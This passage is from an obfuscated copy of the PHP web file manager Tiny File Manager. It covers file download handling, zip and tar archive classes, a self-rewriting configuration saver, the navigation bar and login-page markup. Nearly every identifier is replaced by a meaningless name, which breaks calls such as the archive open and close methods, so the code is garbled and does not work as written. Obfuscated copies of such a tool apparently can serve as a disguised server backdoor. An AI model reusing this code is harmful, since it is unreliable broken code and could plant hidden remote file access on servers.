bytes");$g326=0;if(isset($_SERVER['HTTP_RANGE'])){list($x327,$g326)=explode("=",$_SERVER['HTTP_RANGE']);str_replace($g326,"-",$g326);$a328=$p285-1;$f329=$p285-$g326;header("HTTP/1.1 206 Partial Content");header("Content-Length: $f329");header("Content-Range: bytes $g326$a328/$p285");}else{$a328=$p285-1;header("Content-Range: bytes 0-$a328/$p285");header("Content-Length: ".$p285);}$f322=realpath($f322);while(ob_get_level())ob_end_clean();readfile($f322);fclose($e147);return((connection_status()==0)and!connection_aborted());}/**
  737.  * If the theme is dark, return the text-white and bg-dark classes.
  738.  * @return string the value of the  variable.
  739.  */ function x44(){$r330='';if(FM_THEME=="dark"){$r330="text-white bg-dark";}return $r330;}/**
  740.  * Class to work with zip files (using ZipArchive)
  741.  */ class g195{private $f331;public function w45(){$this->$a332=new r333();}/**
  742.      * Create archive with name $filename and files $files (RELATIVE PATHS!)
  743.      * @param string $filename
  744.      * @param array|string $files
  745.      * @return bool
  746.      */ public function t46($p181,$t171){$a130=$this->$a332->v334($p181,ZipArchive::CREATE);if($a130!==true){return false;}if(is_array($t171)){foreach($t171 as $l172){$l172=s19($l172);if(!$this->s48($l172)){$this->$a332->f335();return false;}}$this->$a332->f335();return true;}else{if($this->s48($t171)){$this->$a332->f335();return true;}return false;}}/**
  747.      * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS)
  748.      * @param string $filename
  749.      * @param string $path
  750.      * @return bool
  751.      */ public function p47($p181,$h110){$a130=$this->$a332->v334($p181);if($a130!==true){return false;}if($this->$a332->y204($h110)){$this->$a332->f335();return true;}return false;}/**
  752.      * Add file/folder to archive
  753.      * @param string $filename
  754.      * @return bool
  755.      */ private function s48($p181){if(is_file($p181)){return $this->$a332->g336($p181);}elseif(is_dir($p181)){return $this->r49($p181);}return false;}/**
  756.      * Add folder recursively
  757.      * @param string $path
  758.      * @return bool
  759.      */ private function r49($h110){if(!$this->$a332->y337($h110)){return false;}$x207=scandir($h110);if(is_array($x207)){foreach($x207 as $b98){if($b98!='.'&&$b98!='..'){if(is_dir($h110.'/'.$b98)){if(!$this->r49($h110.'/'.$b98)){return false;}}elseif(is_file($h110.'/'.$b98)){if(!$this->$a332->g336($h110.'/'.$b98)){return false;}}}}return true;}return false;}}/**
  760.  * Class to work with Tar files (using PharData)
  761.  */ class j197{private $c196;public function w45(){$this->$b338=null;}/**
  762.      * Create archive with name $filename and files $files (RELATIVE PATHS!)
  763.      * @param string $filename
  764.      * @param array|string $files
  765.      * @return bool
  766.      */ public function t46($p181,$t171){$this->$b338=new y203($p181);if(is_array($t171)){foreach($t171 as $l172){$l172=s19($l172);if(!$this->s48($l172)){return false;}}return true;}else{if($this->s48($t171)){return true;}return false;}}/**
  767.      * Extract archive $filename to folder $path (RELATIVE OR ABSOLUTE PATHS)
  768.      * @param string $filename
  769.      * @param string $path
  770.      * @return bool
  771.      */ public function p47($p181,$h110){$a130=$this->$b338->v334($p181);if($a130!==true){return false;}if($this->$b338->y204($h110)){return true;}return false;}/**
  772.      * Add file/folder to archive
  773.      * @param string $filename
  774.      * @return bool
  775.      */ private function s48($p181){if(is_file($p181)){try{$this->$b338->g336($p181);return true;}catch(Exception $d123){return false;}}elseif(is_dir($p181)){return $this->r49($p181);}return false;}/**
  776.      * Add folder recursively
  777.      * @param string $path
  778.      * @return bool
  779.      */ private function r49($h110){$x207=scandir($h110);if(is_array($x207)){foreach($x207 as $b98){if($b98!='.'&&$b98!='..'){if(is_dir($h110.'/'.$b98)){if(!$this->r49($h110.'/'.$b98)){return false;}}elseif(is_file($h110.'/'.$b98)){try{$this->$b338->g336($h110.'/'.$b98);}catch(Exception $d123){return false;}}}}return true;}return false;}}/**
  780.  * Save Configuration
  781.  */ class k88{var $b339;function w45(){global $n68,$w69,$q58;$p340=$w69.$_SERVER["PHP_SELF"];$this->$a90=array('lang'=>'en','error_reporting'=>true,'show_hidden'=>true);$b339=false;if(strlen($q58)){$b339=s32(json_decode($q58));}else{$b97='Tiny File Manager<br>Error: Cannot load configuration';if(substr($p340,-1)=='/'){$p340=rtrim($p340,'/');$b97.='<br>';$b97.='<br>Seems like you have a trailing slash on the URL.';$b97.='<br>Try this link: <a href="'.$p340.'">'.$p340.'</a>';}die($b97);}if(is_array($b339)&&count($b339))$this->$a90=$b339;else $this->g50();}function g50(){$r341=__FILE__;$e342='$CONFIG';$a343=var_export(json_encode($this->$a90),true);$m344="<?php".chr(13).chr(10)."//Default Configuration".chr(13).chr(10)."$e342 = $a343;".chr(13).chr(10);if(is_writable($r341)){$k345=file($r341);if($o346=@fopen($r341,"w")){@fputs($o346,$m344,strlen($m344));for($h211=3;$h211<count($k345);$h211++){@fputs($o346,$k345[$h211],strlen($k345[$h211]));}@fclose($o346);}}}}/**
  782.  * Show nav block
  783.  * @param string $path
  784.  */ function b51($h110){global $x89,$x78,$m240;$b347=$x78?'fixed-top':'';$o348=x44();$o348.=" navbar-light";if(FM_THEME=="dark"){$o348.=" navbar-dark";}else{$o348.=" bg-white";}?>
  785.     <nav class="navbar navbar-expand-lg <?php echo $o348;?> mb-4 main-nav <?php echo $b347 ?>">
  786.         <a class="navbar-brand"> <?php echo z57('AppTitle')?> </a>
  787.         <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
  788.             <span class="navbar-toggler-icon"></span>
  789.         </button>
  790.         <div class="collapse navbar-collapse" id="navbarSupportedContent">
  791.  
  792.             <?php $h110=s19($h110);$w69="<a href='?p='><i class='fa fa-home' aria-hidden='true' title='".FM_ROOT_PATH."'></i></a>";$q349='<i class="bread-crumb"> / </i>';if($h110!=''){$r350=explode('/',$h110);$l351=count($r350);$r275=array();$f206='';for($y352=0;$y352<$l351;$y352++){$f206=trim($f206.'/'.$r350[$y352],'/');$a353=urlencode($f206);$r275[]="<a href='?p={$a353}'>".w27(h31($r350[$y352]))."</a>";}$w69.=$q349.x5($q349,$r275);}echo '<div class="col-xs-6 col-sm-5">'.$w69.$m240.'</div>';?>
  793.  
  794.             <div class="col-xs-6 col-sm-7">
  795.                 <ul class="navbar-nav justify-content-end <?php echo x44();?>">
  796.                     <li class="nav-item mr-2">
  797.                         <div class="input-group input-group-sm mr-1" style="margin-top:4px;">
  798.                             <input type="text" class="form-control" placeholder="<?php echo z57('Filter')?>" aria-label="<?php echo z57('Search')?>" aria-describedby="search-addon2" id="search-addon">
  799.                             <div class="input-group-append">
  800.                                 <span class="input-group-text brl-0 brr-0" id="search-addon2"><i class="fa fa-search"></i></span>
  801.                             </div>
  802.                             <div class="input-group-append btn-group">
  803.                                 <span class="input-group-text dropdown-toggle brl-0" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"></span>
  804.                                   <div class="dropdown-menu dropdown-menu-right">
  805.                                     <a class="dropdown-item" href="<?php echo $g354=$h110?$h110:'.';?>" id="js-search-modal" data-bs-toggle="modal" data-bs-target="#searchModal"><?php echo z57('Advanced Search')?></a>
  806.                                   </div>
  807.                             </div>
  808.                         </div>
  809.                     </li>
  810.                     <?php if(!FM_READONLY):?>
  811.                     <li class="nav-item">
  812.                         <a title="<?php echo z57('Upload')?>" class="nav-link" href="?p=<?php echo urlencode(FM_PATH)?>&amp;upload"><i class="fa fa-cloud-upload" aria-hidden="true"></i> <?php echo z57('Upload')?></a>
  813.                     </li>
  814.                     <li class="nav-item">
  815.                         <a title="<?php echo z57('NewItem')?>" class="nav-link" href="#createNewItem" data-bs-toggle="modal" data-bs-target="#createNewItem"><i class="fa fa-plus-square"></i> <?php echo z57('NewItem')?></a>
  816.                     </li>
  817.                     <?php endif;?>
  818.                     <?php if(FM_USE_AUTH):?>
  819.                     <li class="nav-item avatar dropdown">
  820.                         <a class="nav-link dropdown-toggle" id="navbarDropdownMenuLink-5" data-bs-toggle="dropdown" aria-haspopup="true" aria-expanded="false"> <i class="fa fa-user-circle"></i> <?php if(isset($_SESSION[FM_SESSION_ID]['logged'])){echo $_SESSION[FM_SESSION_ID]['logged'];}?></a>
  821.                         <div class="dropdown-menu text-small shadow <?php echo x44();?>" aria-labelledby="navbarDropdownMenuLink-5">
  822.                             <?php if(!FM_READONLY):?>
  823.                             <a title="<?php echo z57('Settings')?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH)?>&amp;settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo z57('Settings')?></a>
  824.                             <?php endif ?>
  825.                             <a title="<?php echo z57('Help')?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH)?>&amp;help=2"><i class="fa fa-exclamation-circle" aria-hidden="true"></i> <?php echo z57('Help')?></a>
  826.                             <a title="<?php echo z57('Logout')?>" class="dropdown-item nav-link" href="?logout=1"><i class="fa fa-sign-out" aria-hidden="true"></i> <?php echo z57('Logout')?></a>
  827.                         </div>
  828.                     </li>
  829.                     <?php else:?>
  830.                         <?php if(!FM_READONLY):?>
  831.                             <li class="nav-item">
  832.                                 <a title="<?php echo z57('Settings')?>" class="dropdown-item nav-link" href="?p=<?php echo urlencode(FM_PATH)?>&amp;settings=1"><i class="fa fa-cog" aria-hidden="true"></i> <?php echo z57('Settings')?></a>
  833.                             </li>
  834.                         <?php endif;?>
  835.                     <?php endif;?>
  836.                 </ul>
  837.             </div>
  838.         </div>
  839.     </nav>
  840.     <?php }/**
  841.  * Show alert message from session
  842.  */ function k52(){if(isset($_SESSION[FM_SESSION_ID]['message'])){$z355=isset($_SESSION[FM_SESSION_ID]['status'])?$_SESSION[FM_SESSION_ID]['status']:'ok';echo '<p class="message '.$z355.'">'.$_SESSION[FM_SESSION_ID]['message'].'</p>';unset($_SESSION[FM_SESSION_ID]['message']);unset($_SESSION[FM_SESSION_ID]['status']);}}/**
  843.  * Show page header in Login Form
  844.  */ function k53(){$f356='20160315';header("Content-Type: text/html; charset=utf-8");header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");header("Pragma: no-cache");global $x89,$w69,$v75;?>
  845. <!DOCTYPE html>
  846. <html lang="en">
  847. <head>
  848.     <meta charset="utf-8">
  849.     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  850.     <meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager">
  851.     <meta name="author" content="CCP Programmers">
  852.     <meta name="robots" content="noindex, nofollow">
  853.     <meta name="googlebot" content="noindex">
  854.     <?php if($v75){echo '<link rel="icon" href="'.w27($v75).'" type="image/png">';}?>
  855.     <title><?php echo w27(APP_TITLE)?></title>
  856.     <?php m7('pre-jsdelivr');?>
  857.     <?php m7('css-bootstrap');?>
  858.     <style>
  859.         body.fm-login-page{ background-color:#f7f9fb;font-size:14px;background-color:#f7f9fb;background-image:url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 304 304' width='304' height='304'%3E%3Cpath fill='%23e2e9f1' fill-opacity='0.4' d='M44.1 224a5 5 0 1 1 0 2H0v-2h44.1zm160 48a5 5 0 1 1 0 2H82v-2h122.1zm57.8-46a5 5 0 1 1 0-2H304v2h-42.1zm0 16a5 5 0 1 1 0-2H304v2h-42.1zm6.2-114a5 5 0 1 1 0 2h-86.2a5 5 0 1 1 0-2h86.2zm-256-48a5 5 0 1 1 0 2H0v-2h12.1zm185.8 34a5 5 0 1 1 0-2h86.2a5 5 0 1 1 0 2h-86.2zM258 12.1a5 5 0 1 1-2 0V0h2v12.1zm-64 208a5 5 0 1 1-2 0v-54.2a5 5 0 1 1 2 0v54.2zm48-198.2V80h62v2h-64V21.9a5 5 0 1 1 2 0zm16 16V64h46v2h-48V37.9a5 5 0 1 1 2 0zm-128 96V208h16v12.1a5 5 0 1 1-2 0V210h-16v-76.1a5 5 0 1 1 2 0zm-5.9-21.9a5 5 0 1 1 0 2H114v48H85.9a5 5 0 1 1 0-2H112v-48h12.1zm-6.2 130a5 5 0 1 1 0-2H176v-74.1a5 5 0 1 1 2 0V242h-60.1zm-16-64a5 5 0 1 1 0-2H114v48h10.1a5 5 0 1 1 0 2H112v-48h-10.1zM66 284.1a5 5 0 1 1-2 0V274H50v30h-2v-32h18v12.1zM236.1 176a5 5 0 1 1 0 2H226v94h48v32h-2v-30h-48v-98h12.1zm25.8-30a5 5 0 1 1 0-2H274v44.1a5 5 0 1 1-2 0V146h-10.1zm-64 96a5 5 0 1 1 0-2H208v-80h16v-14h-42.1a5 5 0 1 1 0-2H226v18h-16v80h-12.1zm86.2-210a5 5 0 1 1 0 2H272V0h2v32h10.1zM98 101.9V146H53.9a5 5 0 1 1 0-2H96v-42.1a5 5 0 1 1 2 0zM53.9 34a5 5 0 1 1 0-2H80V0h2v34H53.9zm60.1 3.9V66H82v64H69.9a5 5 0 1 1 0-2H80V64h32V37.9a5 5 0 1 1 2 0zM101.9 82a5 5 0 1 1 0-2H128V37.9a5 5 0 1 1 2 0V82h-28.1zm16-64a5 5 0 1 1 0-2H146v44.1a5 5 0 1 1-2 0V18h-26.1zm102.2 270a5 5 0 1 1 0 2H98v14h-2v-16h124.1zM242 149.9V160h16v34h-16v62h48v48h-2v-46h-48v-66h16v-30h-16v-12.1a5 5 0 1 1 2 0zM53.9 18a5 5 0 1 1 0-2H64V2H48V0h18v18H53.9zm112 32a5 5 0 1 1 0-2H192V0h50v2h-48v48h-28.1zm-48-48a5 5 0 0 1-9.8-2h2.07a3 3 0 1 0 5.66 0H178v34h-18V21.9a5 5 0 1 1 2 0V32h14V2h-58.1zm0 96a5 5 0 1 1 0-2H137l32-32h39V21.9a5 5 0 1 1 2 0V66h-40.17l-32 32H117.9zm28.1 90.1a5 5 0 1 1-2 0v-76.51L175.59 80H224V21.9a5 5 0 1 1 2 0V82h-49.59L146 112.41v75.69zm16 32a5 5 0 1 1-2 0v-99.51L184.59 96H300.1a5 5 0 0 1 3.9-3.9v2.07a3 3 0 0 0 0 5.66v2.07a5 5 0 0 1-3.9-3.9H185.41L162 121.41v98.69zm-144-64a5 5 0 1 1-2 0v-3.51l48-48V48h32V0h2v50H66v55.41l-48 48v2.69zM50 53.9v43.51l-48 48V208h26.1a5 5 0 1 1 0 2H0v-65.41l48-48V53.9a5 5 0 1 1 2 0zm-16 16V89.41l-34 34v-2.82l32-32V69.9a5 5 0 1 1 2 0zM12.1 32a5 5 0 1 1 0 2H9.41L0 43.41V40.6L8.59 32h3.51zm265.8 18a5 5 0 1 1 0-2h18.69l7.41-7.41v2.82L297.41 50H277.9zm-16 160a5 5 0 1 1 0-2H288v-71.41l16-16v2.82l-14 14V210h-28.1zm-208 32a5 5 0 1 1 0-2H64v-22.59L40.59 194H21.9a5 5 0 1 1 0-2H41.41L66 216.59V242H53.9zm150.2 14a5 5 0 1 1 0 2H96v-56.6L56.6 162H37.9a5 5 0 1 1 0-2h19.5L98 200.6V256h106.1zm-150.2 2a5 5 0 1 1 0-2H80v-46.59L48.59 178H21.9a5 5 0 1 1 0-2H49.41L82 208.59V258H53.9zM34 39.8v1.61L9.41 66H0v-2h8.59L32 40.59V0h2v39.8zM2 300.1a5 5 0 0 1 3.9 3.9H3.83A3 3 0 0 0 0 302.17V256h18v48h-2v-46H2v42.1zM34 241v63h-2v-62H0v-2h34v1zM17 18H0v-2h16V0h2v18h-1zm273-2h14v2h-16V0h2v16zm-32 273v15h-2v-14h-14v14h-2v-16h18v1zM0 92.1A5.02 5.02 0 0 1 6 97a5 5 0 0 1-6 4.9v-2.07a3 3 0 1 0 0-5.66V92.1zM80 272h2v32h-2v-32zm37.9 32h-2.07a3 3 0 0 0-5.66 0h-2.07a5 5 0 0 1 9.8 0zM5.9 0A5.02 5.02 0 0 1 0 5.9V3.83A3 3 0 0 0 3.83 0H5.9zm294.2 0h2.07A3 3 0 0 0 304 3.83V5.9a5 5 0 0 1-3.9-5.9zm3.9 300.1v2.07a3 3 0 0 0-1.83 1.83h-2.07a5 5 0 0 1 3.9-3.9zM97 100a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-48 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 96a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-144a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm96 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM49 36a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-32 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM33 68a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 240a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm80-176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 48a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm112 176a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm-16 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 180a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0 16a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm0-32a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16 0a3 3 0 1 0 0-6 3 3 0 0 0 0 6zM17 84a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm32 64a3 3 0 1 0 0-6 3 3 0 0 0 0 6zm16-16a3 3 0 1 0 0-6 3 3 0 0 0 0 6z'%3E%3C/path%3E%3C/svg%3E");}
  860.         .fm-login-page .brand{ width:121px;overflow:hidden;margin:0 auto;position:relative;z-index:1}
  861.         .fm-login-page .brand img{ width:100%}
  862.         .fm-login-page .card-wrapper{ width:360px;margin-top:10%;margin-left:auto;margin-right:auto;}
  863.         .fm-login-page .card{ border-color:transparent;box-shadow:0 4px 8px rgba(0,0,0,.05)}
  864.         .fm-login-page .card-title{ margin-bottom:1.5rem;font-size:24px;font-weight:400;}
  865.         .fm-login-page .form-control{ border-width:2.3px}
  866.         .fm-login-page .form-group label{ width:100%}
  867.         .fm-login-page .btn.btn-block{ padding:12px 10px}
  868.         .fm-login-page .footer{ margin:40px 0;color:#888;text-align:center}
  869.         @media screen and (max-width:425px){
  870.             .fm-login-page .card-wrapper{ width:90%;margin:0 auto;margin-top:10%;}
  871.         }
  872.         @media screen and (max-width:320px){
  873.             .fm-login-page .card.fat{ padding:0}
  874.             .fm-login-page .card.fat .card-body{ padding:15px}
  875.         }
  876.         .message{ padding:4px 7px;border:1px solid #ddd;background-color:#fff}
  877.         .message.ok{ border-color:green;color:green}
  878.         .message.error{ border-color:red;color:red}
  879.         .message.alert{ border-color:orange;color:orange}
  880.         body.fm-login-page.theme-dark {background-color: #2f2a2a;}
  881.         .theme-dark svg g, .theme-dark svg path {fill: #ffffff; }
  882.     </style>
  883. </head>
  884. <body class="fm-login-page <?php echo(FM_THEME=="dark")?'theme-dark':'';?>">
  885. <div id="wrapper" class="container-fluid">
  886.  
  887.     <?php }/**
  888.      * Show page footer in Login Form
  889.      */ function c54(){?>
  890. </div>
  891. <?php m7('js-jquery');?>
  892. <?php m7('js-bootstrap');?>
  893. </body>
  894. </html>
  895. <?php }/**
  896.  * Show Header after login
  897.  */ function v55(){$f356='20160315';header("Content-Type: text/html; charset=utf-8");header("Expires: Sat, 26 Jul 1997 05:00:00 GMT");header("Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0");header("Pragma: no-cache");global $x89,$w69,$x78,$v75;$b347=$x78?'navbar-fixed':'navbar-normal';?>
  898. <!DOCTYPE html>
  899. <html>
  900. <head>
  901.     <meta charset="utf-8">
  902.     <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  903.     <meta name="description" content="Web based File Manager in PHP, Manage your files efficiently and easily with Tiny File Manager">
  904.     <meta name="author" content="CCP Programmers">
  905.     <meta name="robots" content="noindex, nofollow">
  906.     <meta name="googlebot" content="noindex">
  907.     <?php if($v75){echo '<link rel="icon" href="'.w27($v75).'" type="image/png">';}?>
  908.     <title><?php echo w27(APP_TITLE)?></title>
  909.     <?php m7('pre-jsdelivr');?>
  910.     <?php m7('pre-cloudflare');?>
  911.     <?php m7('css-bootstrap');?>
  912.     <?php m7('css-font-awesome');?>
  913.     <?php if(FM_USE_HIGHLIGHTJS&&isset($_GET['view'])):?>
  914.     <?php m7('css-highlightjs');?>
  915.     <?php endif;?>
  916.     <script type="text/javascript">window.csrf = '<?php echo $_SESSION['token'];?>';</script>
  917.     <style>
  918.         html { -moz-osx-font-smoothing: grayscale; -webkit-font-smoothing: antialiased; text-rendering: optimizeLegibility; height: 100%; scroll-behavior: smooth;}
  919.         *,*::before,*::after { box-sizing: border-box;}
  920.         body { font-size:15px; color:#222;background:#F7F7F7; }
  921.         body.navbar-fixed { margin-top:55px; }
  922.         a, a:hover, a:visited, a:focus { text-decoration:none !important; }
  923.         .filename, td, th { white-space:nowrap  }
  924.         .navbar-brand { font-weight:bold; }
  925.         .nav-item.avatar a { cursor:pointer;text-transform:capitalize; }
  926.         .nav-item.avatar a > i { font-size:15px; }
  927.         .nav-item.avatar .dropdown-menu a { font-size:13px; }
  928.         #search-addon { font-size:12px;border-right-width:0; }
  929.         .brl-0 { background:transparent;border-left:0; border-top-left-radius: 0; border-bottom-left-radius: 0; }
  930.         .brr-0 { border-top-right-radius: 0; border-bottom-right-radius: 0; }
  931.         .bread-crumb { color:#cccccc;font-style:normal; }
  932.         #main-table { transition: transform .25s cubic-bezier(0.4, 0.5, 0, 1),width 0s .25s;}
  933.         #main-table .filename a { color:#222222; }
  934.         .table td, .table th { vertical-align:middle !important; }
  935.         .table .custom-checkbox-td .custom-control.custom-checkbox, .table .custom-checkbox-header .custom-control.custom-checkbox { min-width:18px; display: flex;align-items: center; justify-content: center; }
  936.         .table-sm td, .table-sm th { padding:.4rem; }
  937.         .table-bordered td, .table-bordered th { border:1px solid #f1f1f1; }
  938.         .hidden { display:none  }
  939.         pre.with-hljs { padding:0; overflow: hidden;  }
  940.         pre.with-hljs code { margin:0;border:0;overflow:scroll;  }
  941.         code.maxheight, pre.maxheight { max-height:512px  }
  942.         .fa.fa-caret-right { font-size:1.2em;margin:0 4px;vertical-align:middle;color:#ececec  }
  943.         .fa.fa-home { font-size:1.3em;vertical-align:bottom  }
  944.         .path { margin-bottom:10px  }
  945.         form.dropzone { min-height:200px;border:2px dashed #007bff;line-height:6rem; }
  946.         .right { text-align:right  }
  947.         .center, .close, .login-form, .preview-img-container { text-align:center  }
  948.         .message { padding:4px 7px;border:1px solid #ddd;background-color:#fff  }
  949.         .message.ok { border-color:green;color:green  }
  950.         .message.error { border-color:red;color:red  }
  951.         .message.alert { border-color:orange;color:orange  }
  952.         .preview-img { max-width:100%;max-height:80vh;background:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAKklEQVR42mL5//8/Azbw+PFjrOJMDCSCUQ3EABZc4S0rKzsaSvTTABBgAMyfCMsY4B9iAAAAAElFTkSuQmCC) }
  953.         .inline-actions > a > i { font-size:1em;margin-left:5px;background:#3785c1;color:#fff;padding:3px 4px;border-radius:3px; }
  954.         .preview-video { position:relative;max-width:100%;height:0;padding-bottom:62.5%;margin-bottom:10px  }
  955.         .preview-video video { position:absolute;width:100%;height:100%;left:0;top:0;background:#000  }
  956.         .compact-table { border:0;width:auto  }
  957.         .compact-table td, .compact-table th { width:100px;border:0;text-align:center  }
  958.         .compact-table tr:hover td { background-color:#fff  }
  959.         .filename { max-width:420px;overflow:hidden;text-overflow:ellipsis  }
  960.         .break-word { word-wrap:break-word;margin-left:30px  }
  961.         .break-word.float-left a { color:#7d7d7d  }
  962.         .break-word + .float-right { padding-right:30px;position:relative  }
  963.         .break-word + .float-right > a { color:#7d7d7d;font-size:1.2em;margin-right:4px  }
  964.         #editor { position:absolute;right:15px;top:100px;bottom:15px;left:15px  }
  965.         @media (max-width:481px) {
  966.             #editor { top:150px; }
  967.         }
  968.         #normal-editor { border-radius:3px;border-width:2px;padding:10px;outline:none; }
  969.         .btn-2 { padding:4px 10px;font-size:small; }
  970.         li.file:before,li.folder:before { font:normal normal normal 14px/1 FontAwesome;content:"\f016";margin-right:5px }
  971.         li.folder:before { content:"\f114" }
  972.         i.fa.fa-folder-o { color:#0157b3 }
  973.         i.fa.fa-picture-o { color:#26b99a }
  974.         i.fa.fa-file-archive-o { color:#da7d7d }
  975.         .btn-2 i.fa.fa-file-archive-o { color:inherit }
  976.         i.fa.fa-css3 { color:#f36fa0 }
  977.         i.fa.fa-file-code-o { color:#007bff }
  978.         i.fa.fa-code { color:#cc4b4c }
  979.         i.fa.fa-file-text-o { color:#0096e6 }
  980.         i.fa.fa-html5 { color:#d75e72 }
  981.         i.fa.fa-file-excel-o { color:#09c55d }
  982.         i.fa.fa-file-powerpoint-o { color:#f6712e }
  983.         i.go-back { font-size:1.2em;color:#007bff; }
  984.         .main-nav { padding:0.2rem 1rem;box-shadow:0 4px 5px 0 rgba(0, 0, 0, .14), 0 1px 10px 0 rgba(0, 0, 0, .12), 0 2px 4px -1px rgba(0, 0, 0, .2)  }
  985.         .dataTables_filter { display:none; }
  986.         table.dataTable thead .sorting { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAQAAADYWf5HAAAAkElEQVQoz7XQMQ5AQBCF4dWQSJxC5wwax1Cq1e7BAdxD5SL+Tq/QCM1oNiJidwox0355mXnG/DrEtIQ6azioNZQxI0ykPhTQIwhCR+BmBYtlK7kLJYwWCcJA9M4qdrZrd8pPjZWPtOqdRQy320YSV17OatFC4euts6z39GYMKRPCTKY9UnPQ6P+GtMRfGtPnBCiqhAeJPmkqAAAAAElFTkSuQmCC'); }
  987.         table.dataTable thead .sorting_asc { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZ0lEQVQ4y2NgGLKgquEuFxBPAGI2ahhWCsS/gDibUoO0gPgxEP8H4ttArEyuQYxAPBdqEAxPBImTY5gjEL9DM+wTENuQahAvEO9DMwiGdwAxOymGJQLxTyD+jgWDxCMZRsEoGAVoAADeemwtPcZI2wAAAABJRU5ErkJggg=='); }
  988.         table.dataTable thead .sorting_desc { cursor:pointer;background-repeat:no-repeat;background-position:center right;background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZUlEQVQ4y2NgGAWjYBSggaqGu5FA/BOIv2PBIPFEUgxjB+IdQPwfC94HxLykus4GiD+hGfQOiB3J8SojEE9EM2wuSJzcsFMG4ttQgx4DsRalkZENxL+AuJQaMcsGxBOAmGvopk8AVz1sLZgg0bsAAAAASUVORK5CYII='); }
  989.         table.dataTable thead tr:first-child th.custom-checkbox-header:first-child { background-image:none; }
  990.         .footer-action li { margin-bottom:10px; }
  991.         .app-v-title { font-size:24px;font-weight:300;letter-spacing:-.5px;text-transform:uppercase; }
